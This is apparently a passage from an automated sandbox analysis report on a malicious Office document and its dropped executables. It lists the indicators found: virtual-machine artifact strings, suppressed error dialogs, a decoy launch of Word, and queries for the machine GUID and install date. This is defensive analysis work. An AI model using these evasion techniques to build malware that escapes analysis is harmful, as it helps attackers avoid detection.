Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Thread delayed: delay time: -922337203685477
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe | Binary or memory string: 2\VBoxTray.exe
Source: explorer.exe | Binary or memory string: Root\LEGACY_VMSCSI\0000
Source: explorer.exe | Binary or memory string: SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S&Rev_1.0\4&5fcaafc&1&000
Source: explorer.exe | Binary or memory string: ROOT\LEGACY_VMSCSI\0000
Source: explorer.exe | Binary or memory string: C:\Documents and Settings\Administrator\Local Settings\Application Data\VMware
Source: explorer.exe | Binary or memory string: C:\WINDOWS\system32\VBoxTray.exe
Source: explorer.exe | Binary or memory string: VMware
Source: explorer.exe | Binary or memory string: Root\LEGACY_VMHGFS\0000
Source: explorer.exe | Binary or memory string: SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S&Rev_1.0\4&5fcaafc&0&000
Source: explorer.exe | Binary or memory string: plication Data\VMware
Source: explorer.exe | Binary or memory string: \??\C:\WINDOWS\system32\VBoxService.exe
Source: MSOXMLED.EXE, WINWORD.EXE, fdgfdgdfga.exe, edg1.exe, rundll32.exe, explorer.exe | Binary or memory string: \??\C:\WINDOWS\system32\VBoxTray.exe
Source: explorer.exe | Binary or memory string: Root\LEGACY_VBOXSF\0000
Source: explorer.exe | Binary or memory string: hgfs.dat

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLED.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Documents and Settings\Administrator\Local Settings\Temp\fdgfdgdfga.exe Process information set: NOOPENFILEERRORBOX
Source: C:\edg1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\WINDOWS\system32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Registry key monitored for changes: \REGISTRY\USER
Starts Microsoft Word (often done to prevent the user from detecting that something is wrong)
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLED.EXE Process created: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Language, Device and Operating System Detection:

Contains functionality to create pipes for IPC
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Contains functionality to query local / system time
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Contains functionality to query time zone information
Source: C:\WINDOWS\system32\rundll32.exeCode function: 4_1_20001DF0 GetProfileStringA,CreateEventA,GetWindowsDirectoryW,SetHandleCount,DeleteTimerQueue,CopyFileExW,GetProfileSectionA,FindNextVolumeW,MoveFileWithProgressW,GetTimeZoneInformation,InterlockedPopEntrySList,GetNamedPipeHandleStateA,GetEnvironmentVariableA,WTSGetActiveConsoleSessionId,GetCompressedFileSizeA,IsProcessorFeaturePresent,#200,CreateWaitableTimerW,SetFileShortNameW,WinExec,GetSystemDefaultUILanguage,GlobalFree,SetCommTimeouts,GetMailslotInfo,EnumCalendarInfoExW,VirtualQueryEx,QueryMemoryResourceNotification,InterlockedExchange,SetLocaleInfoA,DeleteFileW,FindNextChangeNotification,ReadFileScatter,DeleteFileA,DeleteVolumeMountPointW,SetConsoleWindowInfo,#260,EnumResourceNamesA,IsValidLanguageGroup,lstrcmpiW,UpdateResourceW,CreateWaitableTimerA,VirtualQuery,SuspendThread,EnumSystemCodePagesA,GetConsoleSelectionInfo,#134,UnhandledExceptionFilter,CreateDIBPatternBrushPt,SetComputerNameW,CancelWaitableTimer,SetEndOfFile,GetFullPathNameA,WriteConsoleOutputA,WriteProcessMemory,SetFileTime,lstrcmpW,Sys4_1_20001DF0
Contains functionality to query Windows version
Source: C:\edg1.exe Code function: 3_2_00404002 GetVersionExA
Queries the cryptographic machine GUID
Source: C:\edg1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of Windows
Source: C:\edg1.exe Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: C:\WINDOWS\system32\rundll32.exe Registry key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Queries the installation date of Windows
Source: C:\edg1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc.) of a device
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Queries volume information: C:\word.xml VolumeInformation

Yara Overview

No Yara matches

Screenshot